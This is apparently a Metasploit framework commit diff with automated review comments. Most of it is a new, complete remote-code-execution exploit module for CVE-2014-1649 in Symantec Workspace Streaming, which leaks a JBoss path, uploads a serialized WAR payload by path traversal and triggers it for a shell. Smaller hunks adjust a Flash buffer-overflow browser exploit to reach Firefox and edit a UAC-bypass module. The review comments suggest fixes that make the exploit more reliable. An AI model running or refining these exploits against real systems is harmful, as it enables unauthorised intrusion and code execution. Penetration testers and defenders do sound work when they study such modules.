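--- a/modules/auxiliary/scanner/snmp/netopia_enum.rb
+++ b/modules/auxiliary/scanner/snmp/netopia_enum.rb
@@ -95,7 +95,7 @@ class Metasploit3 < Msf::Auxiliary
      rescue ::Interrupt
        raise $!
      rescue ::Exception => e
-       print_error("#{ip} error: #{e.class} #{e}")
+       print_error("#{ip} - Error: #{e.class} #{e}")
      disconnect_snmp
      end
   end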

+ 1
- 1
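--- a/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb
+++ b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb
@@ -152,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary
      rescue ::Interrupt
        raise $!
      rescue ::Exception => e
-       print_error("#{ip} error: #{e.class} #{e}")
+       print_error("#{ip} - Error: #{e.class} #{e}")
      disconnect_snmp
      end
   end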

+ 356
- 0
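--- a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb
+++ b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb
@@ -0,0 +1,356 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rexml/document'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  include REXML
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Symantec Workspace Streaming Arbitrary File Upload',
+      'Description' => %q{
+        This module exploits a code execution flaw in Symantec Workspace Streaming. The
+        vulnerability exists in the ManagementAgentServer.putFile XMLRPC call exposed by the
+        as_agent.exe service, which allows for uploading arbitrary files under the server root.
+        This module abuses the auto deploy feature in the JBoss as_ste.exe instance in order
+        to achieve remote code execution. This module has been tested successfully on Symantec
+        Workspace Streaming 6.1 SP8 and Windows 2003 SP2. Abused services listen on a single
+        machine deployment, and also in the backend role in a multiple machine deployment.
+      },
+      'Author'       =>
+        [
+          'rgod <rgod[at]autistici.org>', # Vulnerability discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['CVE', '2014-1649'],
+          ['BID', '67189'],
+          ['ZDI', '14-127'],
+          ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140512_00']
+        ],
+      'Privileged'  => true,
+      'Platform'    => 'java',
+      'Arch' => ARCH_JAVA,
+      'Targets'     =>
+        [
+          [ 'Symantec Workspace Streaming 6.1 SP8 / Java Universal', {} ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'May 12 2014'))
+
+    register_options(
+      [
+        Opt::RPORT(9855), # as_agent.exe (afuse XMLRPC to upload arbitrary file)
+        OptPort.new('STE_PORT', [true, "The remote as_ste.exe AS server port", 9832]), # as_ste.exe (abuse jboss auto deploy)
+      ], self.class)
+  end
+
+  def send_xml_rpc_request(xml)
+    res = send_request_cgi(
+      {
+        'uri'     => normalize_uri("/", "xmlrpc"),
+        'method'  => 'POST',
+        'ctype'   => 'text/xml; charset=UTF-8',
+        'data'    => xml
+      })
+
+    res
+  end
+
+  def build_soap_get_file(file_path)
+    xml = Document.new
+    xml.add_element(
+        "methodCall",
+        {
+            'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
+        })
+    method_name = xml.root.add_element("methodName")
+    method_name.text = "ManagementAgentServer.getFile"
+
+    params = xml.root.add_element("params")
+
+    param_server_root = params.add_element("param")
+    value_server_root = param_server_root.add_element("value")
+    value_server_root.text = "*AWESE"
+
+    param_file_type = params.add_element("param")
+    value_file_type = param_file_type.add_element("value")
+    type_file_type = value_file_type.add_element("i4")
+    type_file_type.text = "0" # build path from the server root directory
+
+    param_file_name = params.add_element("param")
+    value_file_name = param_file_name.add_element("value")
+    value_file_name.text = file_path
+
+    param_file_binary = params.add_element("param")
+    value_file_binary = param_file_binary.add_element("value")
+    type_file_binary = value_file_binary.add_element("boolean")
+    type_file_binary.text = "0"
+
+    xml << XMLDecl.new("1.0", "UTF-8")
+
+    xml.to_s
+  end
+
+  def build_soap_put_file(file)
+    xml = Document.new
+    xml.add_element(
+        "methodCall",
+        {
+            'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
+        })
+    method_name = xml.root.add_element("methodName")
+    method_name.text = "ManagementAgentServer.putFile"
+
+    params = xml.root.add_element("params")
+
+    param_server_root = params.add_element("param")
+    value_server_root = param_server_root.add_element("value")
+    value_server_root.text = "*AWESE"
+
+    param_file_type = params.add_element("param")
+    value_file_type = param_file_type.add_element("value")
+    type_file_type = value_file_type.add_element("i4")
+    type_file_type.text = "0" # build path from the server root directory
+
+    param_file = params.add_element("param")
+    value_file = param_file.add_element("value")
+    type_value_file = value_file.add_element("ex:serializable")
+    type_value_file.text = file
+
+    xml << XMLDecl.new("1.0", "UTF-8")
+
+    xml.to_s
+  end
+
+  def build_soap_check_put
+    xml = Document.new
+    xml.add_element(
+        "methodCall",
+        {
+            'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
+        })
+    method_name = xml.root.add_element("methodName")
+    method_name.text = "ManagementAgentServer.putFile"
+    xml.root.add_element("params")
+    xml << XMLDecl.new("1.0", "UTF-8")
+    xml.to_s
+  end
+
+  def parse_method_response(xml)
+    doc = Document.new(xml)
+    file = XPath.first(doc, "methodResponse/params/param/value/ex:serializable")
+
+    unless file.nil?
+      file = Rex::Text.decode_base64(file.text)
+    end
+
+    file
+  end
+
+  def get_file(path)
+    xml_call = build_soap_get_file(path)
+    file = nil
+
+    res = send_xml_rpc_request(xml_call)
+
+    if res && res.code == 200 && res.body
+      file = parse_method_response(res.body.to_s)
+    end
+
+    file
+  end
+
+  def put_file(file)
+    result = nil
+    xml_call = build_soap_put_file(file)
+
+    res = send_xml_rpc_request(xml_call)
+
+    if res && res.code == 200 && res.body
+      result = parse_method_response(res.body.to_s)
+    end
+
+    result
+  end
+
+  def upload_war(war_name, war, dst)
+    result = false
+    java_file = build_java_file_info("#{dst}#{war_name}", war)
+    java_file = Rex::Text.encode_base64(java_file)
+
+    res = put_file(java_file)
+
+    if res && res =~ /ReturnObject.*StatusMessage.*Boolean/
+      result = true
+    end
+
+    result
+  end
+
+  def jboss_deploy_path
+    path = nil
+    leak = get_file("bin/CreateDatabaseSchema.cmd")
+
+    if leak && leak =~ /\[INSTALLDIR\](.*)ste\/ste.jar/
+      path = $1
+    end
+
+    path
+  end
+
+  def check
+    check_result = Exploit::CheckCode::Safe
+
+    if jboss_deploy_path.nil?
+      xml = build_soap_check_put
+      res = send_xml_rpc_request(xml)
+
+      if res && res.code == 200 && res.body && res.body.to_s =~ /No method matching arguments/
+        check_result =  Exploit::CheckCode::Detected
+      end
+    else
+      check_result =  Exploit::CheckCode::Appears
+    end
+
+    check_result
+  end
+
+  def exploit
+    print_status("#{peer} - Leaking the jboss deployment directory...")
+    jboss_path =jboss_deploy_path
+
+    if jboss_path.nil?
+      fail_with(Exploit::Unknown, "#{peer} - Failed to disclose the jboss deployment directory")
+    end
+
+    print_status("#{peer} - Building WAR payload...")
+
+    app_name = Rex::Text.rand_text_alpha(4 + rand(4))
+    war_name = "#{app_name}.war"
+    war = payload.encoded_war({ :app_name => app_name }).to_s
+    deploy_dir = "..#{jboss_path}"
+
+    print_status("#{peer} - Uploading WAR payload...")
+
+    res = upload_war(war_name, war, deploy_dir)
+
+    unless res
+      fail_with(Exploit::Unknown, "#{peer} - Failed to upload the war payload")
+    end
+
+    register_files_for_cleanup("../server/appstream/deploy/#{war_name}")
+
+    10.times do
+      select(nil, nil, nil, 2)
+
+      # Now make a request to trigger the newly deployed war
+      print_status("#{rhost}:#{ste_port} - Attempting to launch payload in deployed WAR...")
+      res = send_request_cgi(
+        {
+          'uri'    => normalize_uri("/", app_name, Rex::Text.rand_text_alpha(rand(8)+8)),
+          'method' => 'GET',
+          'rport'  => ste_port # Auto Deploy can be reached through the "as_ste.exe" service
+        })
+      # Failure. The request timed out or the server went away.
+      break if res.nil?
+      # Success! Triggered the payload, should have a shell incoming
+      break if res.code == 200
+    end
+
+  end
+
+  def ste_port
+    datastore['STE_PORT']
+  end
+
+  # com.appstream.cm.general.FileInfo serialized object
+  def build_java_file_info(file_name, contents)
+    stream =  "\xac\xed" # stream magic
+    stream << "\x00\x05" # stream version
+    stream << "\x73" # new Object
+
+    stream << "\x72" # TC_CLASSDESC
+    stream << ["com.appstream.cm.general.FileInfo".length].pack("n")
+    stream << "com.appstream.cm.general.FileInfo"
+    stream << "\xa3\x02\xb6\x1e\xa1\x6b\xf0\xa7" # class serial version identifier
+    stream << "\x02" # flags SC_SERIALIZABLE
+    stream << [6].pack("n") # number of fields in the class
+
+    stream << "Z" # boolean
+    stream << ["bLastPage".length].pack("n")
+    stream << "bLastPage"
+
+    stream << "J" # long
+    stream << ["lFileSize".length].pack("n")
+    stream << "lFileSize"
+
+    stream << "[" # array
+    stream << ["baContent".length].pack("n")
+    stream << "baContent"
+    stream << "\x74" # TC_STRING
+    stream << ["[B".length].pack("n")
+    stream << "[B" # field's type (byte array)
+
+    stream << "L" # Object
+    stream << ["dTimeStamp".length].pack("n")
+    stream << "dTimeStamp"
+    stream << "\x74" # TC_STRING
+    stream << ["Ljava/util/Date;".length].pack("n")
+    stream << "Ljava/util/Date;" #field's type (Date)
+
+    stream << "L" # Object
+    stream << ["sContent".length].pack("n")
+    stream << "sContent"
+    stream << "\x74" # TC_STRING
+    stream << ["Ljava/lang/String;".length].pack("n")
+    stream << "Ljava/lang/String;" #field's type (String)
+
+    stream << "L" # Object
+    stream << ["sFileName".length].pack("n")
+    stream << "sFileName"
+    stream << "\x71" # TC_REFERENCE
+    stream << [0x007e0003].pack("N") # handle
+
+    stream << "\x78" # TC_ENDBLOCKDATA
+    stream << "\x70" # TC_NULL
+
+    # Values
+    stream << [1].pack("c") # bLastPage
+
+    stream << [0xffffffff, 0xffffffff].pack("NN") # lFileSize
+
+    stream << "\x75" # TC_ARRAY
+    stream << "\x72" # TC_CLASSDESC
+    stream << ["[B".length].pack("n")
+    stream << "[B" # byte array)
+    stream << "\xac\xf3\x17\xf8\x06\x08\x54\xe0" # class serial version identifier
+    stream << "\x02" # flags SC_SERIALIZABLE
+    stream << [0].pack("n") # number of fields in the class
+    stream << "\x78" # TC_ENDBLOCKDATA
+    stream << "\x70" # TC_NULL
+    stream << [contents.length].pack("N")
+    stream << contents # baContent
+
+    stream << "\x70" # TC_NULL # dTimeStamp
+
+    stream << "\x70" # TC_NULL # sContent
+
+    stream << "\x74" # TC_STRING
+    stream << [file_name.length].pack("n")
+    stream << file_name # sFileName
+
+    stream
+  end
+
+end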
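Review bot: `register_files_for_cleanup("../server/appstream/deploy/#{war_name}")` in `exploit` hard-codes the deploy directory, while the upload itself goes to `deploy_dir` built from the leaked `jboss_path`, so if the leaked path ever differs the cleanup entry points at a file that was never written. If the two paths are intentionally relative to different working directories (the session's versus the as_agent server root) a comment saying so would help; otherwise `register_files_for_cleanup("#{deploy_dir}#{war_name}")` keeps them in sync. In `build_java_file_info` the length prefixes use `contents.length` and `file_name.length`; since `contents` is a binary WAR, `contents.bytesize` is the safer choice for the 4-byte array length, as the two differ whenever the string's encoding is not ASCII-8BIT. `parse_method_response` hands the server's body straight to `Document.new` without rescuing `REXML::ParseException`, so a non-XML response would abort the module instead of returning nil. Minor style: `jboss_path =jboss_deploy_path` is missing the space after `=`.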

+ 7
- 7
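--- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
+++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
@@ -17,8 +17,8 @@ class Metasploit3 < Msf::Exploit::Remote
         This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
         vulnerability occurs in the flash.Display.Shader class, when setting specially
         crafted data as its bytecode, as exploited in the wild in April 2014. This module
-        has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over
-        Windows XP SP3, Windows 7 SP1 and Windows 8.
+        has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13
+        over Windows XP SP3, Windows 7 SP1 and Windows 8.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -42,7 +42,8 @@ class Metasploit3 < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          # Disabled by default to allow sessions on Firefox, still useful when exploiting IE
+          #'InitialAutoRunScript' => 'migrate -f',
           'Retries'              => false,
           'EXITFUNC'             => "thread"
         },
@@ -50,10 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'BrowserRequirements' =>
         {
           :source  => /script|headers/i,
-          :clsid   => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
-          :method  => "LoadMovie",
           :os_name => Msf::OperatingSystems::WINDOWS,
-          :ua_name => Msf::HttpClients::IE,
+          :ua_name => lambda { |ua| ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF},
           :flash   => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') }
         },
       'Targets'        =>
@@ -84,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     if request.uri =~ /\.swf$/
       print_status("Sending SWF...")
-      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
+      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
       return
     end
 
@@ -111,6 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <param name="allowScriptAccess" value="always" />
     <param name="FlashVars" value="sh=<%=flash_payload%>" />
     <param name="Play" value="true" />
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=flash_payload%>" Play="true"/>
     </object>
     </body>
     </html>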
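Review bot: The updated description still lists only IE 6 to IE 11 as tested, while the `BrowserRequirements` hunk now admits Firefox through the new `:ua_name` lambda and the `InitialAutoRunScript` comment talks about Firefox sessions; a sentence in the description stating which Firefox versions were tested, or that Firefox support is untested, would keep the metadata consistent with the code. Style: the new lambda reads more clearly as `:ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) },` which also fixes the missing space before the closing brace. The neighbouring `:flash` lambda's `ver <= '13.0.0.182'` is a lexicographic string comparison rather than a version comparison, so a build number with fewer digits could be misclassified; that line is pre-existing context, not part of this change, but it is worth a follow-up.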

+ 2
- 0
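--- a/modules/exploits/windows/local/bypassuac_injection.rb
+++ b/modules/exploits/windows/local/bypassuac_injection.rb
@@ -24,6 +24,8 @@ class Metasploit3 < Msf::Exploit::Local
         technique to drop only the DLL payload binary instead of three seperate
         binaries in the standard technique. However, it requires the correct
         architecture to be selected, (use x64 for SYSWOW64 systems also).
+        If specifying EXE::Custom your DLL should call ExitProcess() after starting
+        your payload in a seperate process.
       },
       'License'       => MSF_LICENSE,
       'Author'        => [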
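Review bot: The added description line spells `seperate` in `your payload in a seperate process.`; the word is `separate`, and the pre-existing `three seperate` two lines above has the same typo and could be corrected in the same pass. The ExitProcess() requirement is a constraint users will easily miss inside a description paragraph; if this module registers an `EXE::Custom` option, repeating the constraint in that option's help text would make it harder to overlook.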
